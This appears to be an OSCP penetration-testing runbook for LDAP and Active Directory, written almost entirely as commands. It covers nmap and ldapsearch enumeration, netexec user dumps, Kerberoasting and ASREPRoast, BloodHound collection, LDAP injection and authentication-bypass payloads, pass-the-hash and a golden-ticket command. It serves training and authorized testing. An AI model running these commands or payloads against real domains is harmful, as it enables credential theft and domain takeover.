Lightweight Directory Access Protocol

Environment Variables / Setup

export IP=
export DOMAIN=domain.local
export BASE_DN="DC=domain,DC=local"
export LDAPS_PORT=636

Phase 1: LDAP Service Discovery

Nmap LDAP Scripts

nmap -n -sV --script "ldap* and not brute" $IP -p 389,636

Service Detection

# Check LDAP service
nmap -p 389,636 $IP

# Check for LDAPS (secure LDAP)
nmap -p 636 --script ssl-enum-ciphers $IP

Phase 2: Anonymous LDAP Enumeration

Anonymous LDAP Bind

# Basic anonymous search
ldapsearch -x -H ldap://$IP -b "$BASE_DN"

# Get naming contexts
ldapsearch -x -H ldap://$IP -s base namingcontexts

# Get domain information
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=*)"

NetExec LDAP Enumeration

# Basic LDAP enumeration
netexec ldap $IP

# Anonymous enumeration
netexec ldap $IP -u '' -p ''

# Domain information
netexec ldap $IP -u '' -p '' --users
netexec ldap $IP -u '' -p '' --groups

Phase 3: LDAP User Enumeration

User Discovery

# Search for all users
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=user)" sAMAccountName

# Get user details
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=user)" sAMAccountName mail userPrincipalName

# Search for specific user
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(sAMAccountName=administrator)"

Group Enumeration

# Search for all groups
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=group)" cn

# Get group members
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(cn=Domain Admins)" member

# Administrative groups
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(|(cn=Domain Admins)(cn=Enterprise Admins)(cn=Schema Admins))" member

Phase 4: Computer and Service Enumeration

Computer Objects

# Search for computers
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=computer)" dNSHostName

# Service Principal Names (SPNs)
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(servicePrincipalName=*)" servicePrincipalName

# Get computer details
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(objectClass=computer)" operatingSystem

Service Account Discovery

# Find service accounts with SPNs
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

# Accounts with delegation
ldapsearch -x -H ldap://$IP -b "$BASE_DN" "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

Phase 5: LDAP with Credentials

Authenticated LDAP Search

# With username/password
ldapsearch -x -H ldap://$IP -D "username@$DOMAIN" -w password -b "$BASE_DN" "(objectClass=user)"

# Get password policy
ldapsearch -x -H ldap://$IP -D "username@$DOMAIN" -w password -b "$BASE_DN" "(objectClass=domainDNS)" pwdProperties maxPwdAge

NetExec Authenticated Enumeration

# With credentials
netexec ldap $IP -u username -p password --users
netexec ldap $IP -u username -p password --groups
netexec ldap $IP -u username -p password --computers

# Password policy
netexec ldap $IP -u username -p password --pass-pol

# ASREPRoast
netexec ldap $IP -u username -p password --asreproast asrep.txt

# Kerberoasting
netexec ldap $IP -u username -p password --kerberoasting kerb.txt

Phase 6: LDAP Attack Vectors

LDAP Injection

# Test LDAP injection in web applications
# Common injection points: username fields, search parameters

# Basic injection tests:
*)(uid=*))(|(uid=*
*)(cn=*))(|(cn=*
*))%00

# Authentication bypass:
admin)(&
admin)(|(password=*

Null Session Testing

# Test anonymous access
ldapsearch -x -H ldap://$IP -b "" -s base "(objectclass=*)"

# Alternative null session test
ldapsearch -x -H ldap://$IP -D "" -w "" -b "$BASE_DN"

Phase 7: LDAPS (Secure LDAP)

LDAPS Enumeration

# Connect to LDAPS
ldapsearch -x -H ldaps://$IP:636 -b "$BASE_DN"

# Check certificate information
openssl s_client -connect $IP:636 -servername $DOMAIN

# Test with specific TLS version
ldapsearch -x -H ldaps://$IP:636 -ZZ -b "$BASE_DN"

Phase 8: Advanced LDAP Queries

PowerShell AD Queries (if Windows access)

# Get all users
Get-ADUser -Filter * -Properties *

# Get domain controllers
Get-ADDomainController -Filter *

# Get computers
Get-ADComputer -Filter * -Properties *

# Get groups
Get-ADGroup -Filter * -Properties *

# Get password policy
Get-ADDefaultDomainPasswordPolicy

Bloodhound Data Collection

# Using bloodhound-python
bloodhound-python -d $DOMAIN -u username -p password -gc $IP -c all

# Using SharpHound (on target)
./SharpHound.exe -c All -d $DOMAIN

Phase 9: LDAP Exploitation

LDAP Pass-the-Hash

# Using ldap3 with NTLM hash
netexec ldap $IP -u username -H ntlm_hash --users

Golden Ticket via LDAP

# If krbtgt hash is obtained
impacket-ticketer -nthash krbtgt_hash -domain $DOMAIN -domain-sid domain_sid username

# Use ticket for LDAP queries
export KRB5CCNAME=username.ccache
ldapsearch -Y GSSAPI -H ldap://$IP -b "$BASE_DN"

Common LDAP Attributes

User Attributes

sAMAccountName          - Username
userPrincipalName      - User principal name
mail                   - Email address
memberOf               - Group membership
servicePrincipalName   - Service principal names
userAccountControl     - Account control flags
pwdLastSet             - Password last set time

Computer Attributes

dNSHostName            - DNS hostname
operatingSystem        - OS version
servicePrincipalName   - Service SPNs
userAccountControl     - Computer account control

Group Attributes

cn                     - Common name
member                 - Group members
memberOf               - Parent groups

LDAP Filter Examples

# All objects
(objectClass=*)

# Users only
(objectClass=user)

# Computers only
(objectClass=computer)

# Groups only
(objectClass=group)

# Service accounts
(&(objectClass=user)(servicePrincipalName=*))

# Admin accounts
(|(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local)(memberOf=CN=Enterprise Admins,CN=Users,DC=domain,DC=local))

# Enabled accounts
(!(userAccountControl:1.2.840.113556.1.4.803:=2))

# Accounts with passwords that don't expire
(userAccountControl:1.2.840.113556.1.4.803:=65536)

LDAP Enumeration Checklist

Anonymous LDAP bind testing
User enumeration and details
Group enumeration and membership
Computer enumeration and OS versions
Service account discovery (SPNs)
Password policy enumeration
Administrative group membership
Domain controller identification
Trust relationship discovery

Tools Summary

# Manual enumeration
ldapsearch, openssl

# Automated enumeration
netexec, enum4linux-ng, bloodhound-python

# Windows tools
Get-ADUser, Get-ADComputer, SharpHound.exe

Common LDAP Misconfigurations

Anonymous LDAP access enabled
Excessive information disclosure via LDAP
Weak access controls on sensitive objects
Unencrypted LDAP communications
Service accounts with SPNs and weak passwords

Next Steps

Once LDAP enumeration succeeds:

Use discovered users for password attacks
Target service accounts for Kerberoasting
Analyze group memberships for privilege escalation
Map domain structure for lateral movement planning

Veilcat

Explorer

Latest

OSCP 🐲

Medjed

OSCP Note Template and Runbooks

389,636 LDAP(S)

Environment Variables / Setup

Phase 1: LDAP Service Discovery

Nmap LDAP Scripts

Service Detection

Phase 2: Anonymous LDAP Enumeration

Anonymous LDAP Bind

NetExec LDAP Enumeration

Phase 3: LDAP User Enumeration

User Discovery

Group Enumeration

Phase 4: Computer and Service Enumeration

Computer Objects

Service Account Discovery

Phase 5: LDAP with Credentials

Authenticated LDAP Search

NetExec Authenticated Enumeration

Phase 6: LDAP Attack Vectors

LDAP Injection

Null Session Testing

Phase 7: LDAPS (Secure LDAP)

LDAPS Enumeration

Phase 8: Advanced LDAP Queries

PowerShell AD Queries (if Windows access)

Bloodhound Data Collection

Phase 9: LDAP Exploitation

LDAP Pass-the-Hash

Golden Ticket via LDAP

Common LDAP Attributes

User Attributes

Computer Attributes

Group Attributes

LDAP Filter Examples

LDAP Enumeration Checklist

Tools Summary

Common LDAP Misconfigurations

Next Steps

Resources

Graph View

Table of Contents

Backlinks